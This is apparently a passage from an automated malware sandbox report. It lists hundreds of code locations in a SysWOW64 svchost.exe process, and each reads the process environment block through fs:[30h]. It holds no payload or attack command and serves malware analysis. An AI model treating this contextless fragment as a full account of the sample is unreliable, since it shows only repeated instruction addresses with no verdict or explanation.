          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033663FF mov eax, dword ptr fs:[00000030h] 1_2_033663FF
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h] 1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h] 1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h] 1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h] 1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h] 1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h] 1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h] 1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h] 1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h] 1_2_033DE3DB
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h] 1_2_033DE3DB
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_033DE3DB
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h] 1_2_033DE3DB
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033D43D4 mov eax, dword ptr fs:[00000030h] 1_2_033D43D4
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033D43D4 mov eax, dword ptr fs:[00000030h] 1_2_033D43D4
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033EC3CD mov eax, dword ptr fs:[00000030h] 1_2_033EC3CD
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0333A3C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0333A3C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0333A3C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0333A3C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0333A3C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0333A3C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h] 1_2_033383C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h] 1_2_033383C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h] 1_2_033383C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h] 1_2_033383C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B63C0 mov eax, dword ptr fs:[00000030h] 1_2_033B63C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0332823B mov eax, dword ptr fs:[00000030h] 1_2_0332823B
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h] 1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h] 1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h] 1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h] 1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h] 1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h] 1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h] 1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h] 1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h] 1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h] 1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h] 1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h] 1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03334260 mov eax, dword ptr fs:[00000030h] 1_2_03334260
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03334260 mov eax, dword ptr fs:[00000030h] 1_2_03334260
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03334260 mov eax, dword ptr fs:[00000030h] 1_2_03334260
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0332826B mov eax, dword ptr fs:[00000030h] 1_2_0332826B
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0332A250 mov eax, dword ptr fs:[00000030h] 1_2_0332A250
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03336259 mov eax, dword ptr fs:[00000030h] 1_2_03336259
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033EA250 mov eax, dword ptr fs:[00000030h] 1_2_033EA250
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033EA250 mov eax, dword ptr fs:[00000030h] 1_2_033EA250
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B8243 mov eax, dword ptr fs:[00000030h] 1_2_033B8243
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B8243 mov ecx, dword ptr fs:[00000030h] 1_2_033B8243
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033402A0 mov eax, dword ptr fs:[00000030h] 1_2_033402A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033402A0 mov eax, dword ptr fs:[00000030h] 1_2_033402A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h] 1_2_033C62A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_033C62A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h] 1_2_033C62A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h] 1_2_033C62A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h] 1_2_033C62A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h] 1_2_033C62A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0336E284 mov eax, dword ptr fs:[00000030h] 1_2_0336E284
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0336E284 mov eax, dword ptr fs:[00000030h] 1_2_0336E284
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h] 1_2_033B0283
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h] 1_2_033B0283
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h] 1_2_033B0283
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h] 1_2_033402E1
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h] 1_2_033402E1
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h] 1_2_033402E1
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0333A2C3
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0333A2C3
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0333A2C3
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0333A2C3
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0333A2C3
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03360124 mov eax, dword ptr fs:[00000030h] 1_2_03360124
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DA118 mov ecx, dword ptr fs:[00000030h] 1_2_033DA118
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h] 1_2_033DA118
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h] 1_2_033DA118
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h] 1_2_033DA118
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033F0115 mov eax, dword ptr fs:[00000030h] 1_2_033F0115
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h] 1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h] 1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h] 1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h] 1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h] 1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h] 1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h] 1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h] 1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h] 1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h] 1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0332C156 mov eax, dword ptr fs:[00000030h] 1_2_0332C156
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C8158 mov eax, dword ptr fs:[00000030h] 1_2_033C8158
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03336154 mov eax, dword ptr fs:[00000030h] 1_2_03336154
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03336154 mov eax, dword ptr fs:[00000030h] 1_2_03336154
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h] 1_2_033C4144
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h] 1_2_033C4144
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C4144 mov ecx, dword ptr fs:[00000030h] 1_2_033C4144
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h] 1_2_033C4144
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h] 1_2_033C4144
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B019F mov eax, dword ptr fs:[00000030h] 1_2_033B019F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B019F mov eax, dword ptr fs:[00000030h] 1_2_033B019F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B019F mov eax, dword ptr fs:[00000030h] 1_2_033B019F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B019F mov eax, dword ptr fs:[00000030h] 1_2_033B019F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h] 1_2_0332A197
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h] 1_2_0332A197
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h] 1_2_0332A197
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034061E5 mov eax, dword ptr fs:[00000030h] 1_2_034061E5
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03370185 mov eax, dword ptr fs:[00000030h] 1_2_03370185
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033EC188 mov eax, dword ptr fs:[00000030h] 1_2_033EC188
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033EC188 mov eax, dword ptr fs:[00000030h] 1_2_033EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4180 mov eax, dword ptr fs:[00000030h]1_2_033D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4180 mov eax, dword ptr fs:[00000030h]1_2_033D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033601F8 mov eax, dword ptr fs:[00000030h]1_2_033601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_033AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F61C3 mov eax, dword ptr fs:[00000030h]1_2_033F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F61C3 mov eax, dword ptr fs:[00000030h]1_2_033F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6030 mov eax, dword ptr fs:[00000030h]1_2_033C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A020 mov eax, dword ptr fs:[00000030h]1_2_0332A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C020 mov eax, dword ptr fs:[00000030h]1_2_0332C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B4000 mov ecx, dword ptr fs:[00000030h]1_2_033B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335C073 mov eax, dword ptr fs:[00000030h]1_2_0335C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332050 mov eax, dword ptr fs:[00000030h]1_2_03332050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6050 mov eax, dword ptr fs:[00000030h]1_2_033B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F60B8 mov eax, dword ptr fs:[00000030h]1_2_033F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F60B8 mov ecx, dword ptr fs:[00000030h]1_2_033F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C80A8 mov eax, dword ptr fs:[00000030h]1_2_033C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333208A mov eax, dword ptr fs:[00000030h]1_2_0333208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C0F0 mov eax, dword ptr fs:[00000030h]1_2_0332C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033720F0 mov ecx, dword ptr fs:[00000030h]1_2_033720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0332A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033380E9 mov eax, dword ptr fs:[00000030h]1_2_033380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B60E0 mov eax, dword ptr fs:[00000030h]1_2_033B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B20DE mov eax, dword ptr fs:[00000030h]1_2_033B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336273C mov eax, dword ptr fs:[00000030h]1_2_0336273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336273C mov ecx, dword ptr fs:[00000030h]1_2_0336273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336273C mov eax, dword ptr fs:[00000030h]1_2_0336273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AC730 mov eax, dword ptr fs:[00000030h]1_2_033AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C720 mov eax, dword ptr fs:[00000030h]1_2_0336C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C720 mov eax, dword ptr fs:[00000030h]1_2_0336C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330710 mov eax, dword ptr fs:[00000030h]1_2_03330710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03360710 mov eax, dword ptr fs:[00000030h]1_2_03360710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C700 mov eax, dword ptr fs:[00000030h]1_2_0336C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338770 mov eax, dword ptr fs:[00000030h]1_2_03338770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330750 mov eax, dword ptr fs:[00000030h]1_2_03330750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE75D mov eax, dword ptr fs:[00000030h]1_2_033BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372750 mov eax, dword ptr fs:[00000030h]1_2_03372750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372750 mov eax, dword ptr fs:[00000030h]1_2_03372750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B4755 mov eax, dword ptr fs:[00000030h]1_2_033B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov esi, dword ptr fs:[00000030h]1_2_0336674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov eax, dword ptr fs:[00000030h]1_2_0336674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov eax, dword ptr fs:[00000030h]1_2_0336674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033307AF mov eax, dword ptr fs:[00000030h]1_2_033307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E47A0 mov eax, dword ptr fs:[00000030h]1_2_033E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D678E mov eax, dword ptr fs:[00000030h]1_2_033D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033347FB mov eax, dword ptr fs:[00000030h]1_2_033347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033347FB mov eax, dword ptr fs:[00000030h]1_2_033347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE7E1 mov eax, dword ptr fs:[00000030h]1_2_033BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333C7C0 mov eax, dword ptr fs:[00000030h]1_2_0333C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B07C3 mov eax, dword ptr fs:[00000030h]1_2_033B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E627 mov eax, dword ptr fs:[00000030h]1_2_0334E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03366620 mov eax, dword ptr fs:[00000030h]1_2_03366620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368620 mov eax, dword ptr fs:[00000030h]1_2_03368620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333262C mov eax, dword ptr fs:[00000030h]1_2_0333262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372619 mov eax, dword ptr fs:[00000030h]1_2_03372619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE609 mov eax, dword ptr fs:[00000030h]1_2_033AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03362674 mov eax, dword ptr fs:[00000030h]1_2_03362674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]1_2_033F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]1_2_033F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]1_2_0336A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]1_2_0336A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334C640 mov eax, dword ptr fs:[00000030h]1_2_0334C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033666B0 mov eax, dword ptr fs:[00000030h]1_2_033666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C6A6 mov eax, dword ptr fs:[00000030h]1_2_0336C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]1_2_03334690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]1_2_03334690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]1_2_033B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]1_2_033B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0336A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A6C7 mov eax, dword ptr fs:[00000030h]1_2_0336A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
